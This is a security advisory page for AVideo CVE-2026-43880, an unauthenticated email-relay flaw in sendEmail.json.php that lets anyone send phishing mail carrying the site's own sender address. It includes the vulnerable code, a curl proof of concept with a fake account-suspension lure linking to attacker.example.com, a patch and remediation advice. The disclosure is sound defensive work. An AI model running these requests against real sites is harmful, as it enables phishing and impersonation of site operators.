AVideo CVE-2026-43880
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
objects/sendEmail.json.php exposes two branches depending on whether contactForm=1 is submitted. When the parameter is omitted, the endpoint sets $sendTo to an attacker-supplied email and, for unauthenticated callers, uses the site's own contact email as the message From:/Reply-To:. The endpoint is explicitly allow-listed as a "public write action" in objects/functionsSecurity.php (line 885), so it requires no authentication or CSRF token. An unauthenticated attacker (solving a captcha) can force the site's own SMTP infrastructure to send attacker-composed emails to arbitrary recipients with the site's legitimate sender address, passing SPF/DKIM/DMARC for the site's domain - ideal for targeted phishing and brand impersonation.
Details
Vulnerable code (objects/sendEmail.json.php):
10: $valid = Captcha::validation(@$_POST['captcha']);
11: if(User::isAdmin()){
12: $valid = true;
13: }
...
16: if ($valid) {
...
24: $mail = new \PHPMailer\PHPMailer\PHPMailer();
25: setSiteSendMessage($mail); // uses site's SMTP credentials
...
30: $replyTo = User::getEmail_();
31: if (empty($replyTo)) {
32: $replyTo = $config->getContactEmail(); // <-- FALLBACK to site's own email
33: }
34:
35: $sendTo = $_POST['email']; // attacker-controlled recipient
36:
37: // if it is from contact form send the message to the siteowner and the sender is the email on the form field
38: if (!empty($_POST['contactForm'])) {
39: $replyTo = $_POST['email'];
40: $sendTo = $config->getContactEmail();
41: }
42:
43: if (filter_var($sendTo, FILTER_VALIDATE_EMAIL)) {
44: $mail->AddReplyTo($replyTo); // site's address
45: $mail->setFrom($replyTo); // From: site's address
...
47: $mail->addAddress($sendTo); // TO: attacker-chosen victim
...
49: $safeFirstName = htmlspecialchars($_POST['first_name'], ENT_QUOTES, 'UTF-8');
50: $mail->Subject = 'Message From Site ' . $config->getWebSiteTitle() . " ({$safeFirstName})";
51: $mail->msgHTML($msg);
...
55: if (!$mail->send()) { ... }User::getEmail_() (objects/user.php:345-352): returns '' when the caller is not logged in, driving the fallback to $config->getContactEmail().
Endpoint is publicly callable. objects/functionsSecurity.php:879-918 lists sendEmail.json.php in the built-in "public write actions" CSRF/same-domain bypass:
static $builtinBypass = [
...
// Public write actions
'sendEmail.json.php',
...
];
if (in_array($baseName, $builtinBypass, true)) { return; }Why existing defenses don't mitigate the abuse:
- Captcha (
Captcha::validation): costs one solve per email. Manual solves remain viable for targeted phishing, and a separate captcha-bypass primitive in this codebase (tracked separately) automates abuse. FILTER_VALIDATE_EMAIL(line 43): validates$sendToformat, preventing CRLF/header injection, but does not verify that the sender is authorized to send to that address.htmlspecialcharson$safeEmail/$safeComment/$safeFirstName: blocks HTML injection in the rendered message but does not prevent phishing content - attacker fully controls the visible text (URL, instructions) and the perceived sender.- No rate limiting, no auth check, no association between the caller and the recipient address.
Flow summary for the abuse case (unauthenticated, no contactForm):
User::getEmail_()→'', so$replyTo= site's contact email (line 32)$sendTo= attacker's chosen recipient (line 35)contactFormbranch skipped (line 38)- Site's SMTP sends
From: <site contact>to<victim>with attacker's subject/body (lines 44-51)
Because the message is genuinely relayed by the site's mail infrastructure, SPF/DKIM/DMARC for the site's domain pass, making the phishing message indistinguishable from legitimate site mail.
PoC
Endpoint: POST /objects/sendEmail.json.php (also reachable via POST /sendEmail per .htaccess:201).
# 1. Obtain a session + captcha image
curl -c cookies.txt -s 'http://target.example.com/captcha.php?refresh=1' -o captcha.png
# attacker manually solves the captcha -> e.g. 'abc123'
# 2. Send phishing email. Note: contactForm is OMITTED.
# - User::getEmail_() returns '' (unauth) -> $replyTo falls back to site's contact email
# - $sendTo = attacker-chosen recipient
# - setFrom($replyTo) -> From: is the site's real address
curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \
--data-urlencode 'captcha=abc123' \
--data-urlencode 'email=victim@target.com' \
--data-urlencode 'first_name=Support Team' \
--data-urlencode 'comment=Urgent: Your account will be suspended. Please verify at http://attacker.example.com/reset'Expected server response:
{"error":"","success":"Message sent"}Delivered headers at victim@target.com:
From: <site's legitimate contact email, e.g. contact@legit-videosite.com>
Reply-To: <site's legitimate contact email>
To: victim@target.com
Subject: Message From Site <SiteName> (Support Team)
Body: <b>Email:</b> victim@target.com<br><br>Urgent: Your account will be suspended...Contrast with the intended contactForm=1 flow (correctly routes to the site owner):
curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \
--data-urlencode 'captcha=<newcaptcha>' \
--data-urlencode 'email=attacker@attacker.com' \
--data-urlencode 'comment=hi' \
--data-urlencode 'contactForm=1'
# -> $sendTo = site owner's contact email; $replyTo = attacker's email. (Normal contact form.)Omitting contactForm inverts the routing and turns the endpoint into an unauthenticated sender-for-hire using the site's own From: identity.
Impact
- Phishing with the site's real sender identity. Mail originates from the site's SMTP, so SPF/DKIM/DMARC pass; the message is indistinguishable from legitimate site communications and bypasses inbox anti-phishing heuristics.
- Brand impersonation / account-takeover chains. Attacker-controlled subject (
first_name) and body (comment) support credential-harvesting pages that appear to come from the site operator. - Mail-reputation damage. Repeated abuse can blacklist the site's sending IP/domain, degrading legitimate mail deliverability.
- Works against any AVideo instance with SMTP configured - a default deployment after the admin configures SMTP for standard notifications. No privileged position, credentials, or non-default flags required.
Recommended Fix
Collapse the endpoint to contact-owner-only behavior and require either authentication or contactForm=1. Minimal patch:
// objects/sendEmail.json.php
...
$valid = Captcha::validation(@$_POST['captcha']);
if (User::isAdmin()) {
$valid = true;
}
// Reject the non-contactForm branch for unauthenticated callers.
// The "share with a friend" flow already requires User::isLogged()
// in the UI (view/.../functiongetShareMenu.php), so enforce it here too.
if (empty($_POST['contactForm']) && !User::isLogged()) {
$obj = new stdClass();
$obj->error = __("Authentication required");
header('Content-Type: application/json');
echo json_encode($obj);
exit;
}
$obj = new stdClass();
$obj->error = '';
if ($valid) {
...
$replyTo = User::getEmail_();
if (empty($replyTo)) {
// Should no longer be reachable for arbitrary recipients.
// Keep as defense-in-depth only for contactForm=1 path.
$replyTo = $config->getContactEmail();
}
...
}Additional hardening:
- Always use a dedicated
no-reply@address insetFrom(); put the caller's address only inReply-To. Never reuse$config->getContactEmail()as the From for user-initiated messages. - For the logged-in "share" flow, verify the caller's email has been confirmed, and rate-limit by user id and by IP.
- Drop the non-
contactFormbranch entirely if no legitimate unauthenticated UI caller remains. - Add a visible "user-submitted message via our site" banner to the email body so recipients can distinguish these from first-party communications.
AnalysisAI
Unauthenticated arbitrary email sending via sendEmail.json.php allows remote attackers to send phishing emails from the site's legitimate sender address to arbitrary recipients by omitting the contactForm parameter, bypassing authentication and CSRF protections. The endpoint is explicitly allow-listed as a public write action and requires only a solved captcha, enabling an attacker to impersonate the site operator and send messages with forged From/Reply-To headers that pass SPF/DKIM/DMARC validation for the site's domain, ideal for targeted credential harvesting and brand impersonation attacks.
Technical ContextAI
AVideo's sendEmail.json.php endpoint implements two distinct message routing branches controlled by the presence of a contactForm POST parameter. The vulnerable code path occurs when contactForm is omitted: User::getEmail_() returns an empty string for unauthenticated callers, triggering a fallback in line 31-32 that sets $replyTo to $config->getContactEmail() (the site's own contact address). Simultaneously, the attacker-supplied $_POST['email'] is assigned directly to $sendTo without verification of sender authorization. PHPMailer is then configured with $mail->setFrom($replyTo) and $mail->addAddress($sendTo), where $replyTo contains the site's legitimate address and $sendTo contains the attacker's chosen victim. The endpoint is explicitly whitelisted in objects/functionsSecurity.php (lines 879-918) as a built-in public write action, bypassing both CSRF token validation and authentication checks. CWE-940 (Improper Verification of Source of a Communication Channel) manifests as the failure to verify that the caller is authorized to send mail to arbitrary recipients on behalf of the site; the code assumes that controlling the From address implicitly grants mailing privileges to any address.
RemediationAI
Apply the vendor-released patch from commit 4e3709895857a5857f0edb46b0ee984de0d9e1a2, which adds an authentication gate if (empty($_POST['contactForm']) && !User::isLogged()) to reject unauthenticated access to the arbitrary-recipient branch and refactors setFrom() to always use the site's contact email for the non-contactForm path, reserving user-supplied addresses for Reply-To only. Alternatively, as an immediate compensating control, apply network-level access restrictions to block external POST requests to /objects/sendEmail.json.php or /sendEmail via firewall/WAF rules, limiting the endpoint to internal or authenticated subnet access; this mitigates external phishing abuse but does not address internal or compromised-credential scenarios. A more granular compensating control is to configure the SMTP gateway or Mail Transfer Agent (MTA) to strictly enforce DKIM/SPF signing only for a dedicated no-reply@ address and reject outbound mail that attempts to set From to arbitrary administrative addresses, but this requires infrastructure cooperation and does not prevent the vulnerability from being exploited if the attacker controls the allowed sending address. Immediately disable or remove the vulnerable endpoint if the site does not actively use the email-sharing feature (check view/.../functiongetShareMenu.php for UI presence); if sharing functionality is required, restrict it to authenticated users only via the patch. Monitor SMTP logs and mail gateway records for a spike in outbound mail volume, unexpected recipient patterns, or From headers matching the site's contact address with incongruent subject/body content; these are indicators of active exploitation.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-5hgj-7gm9-cff5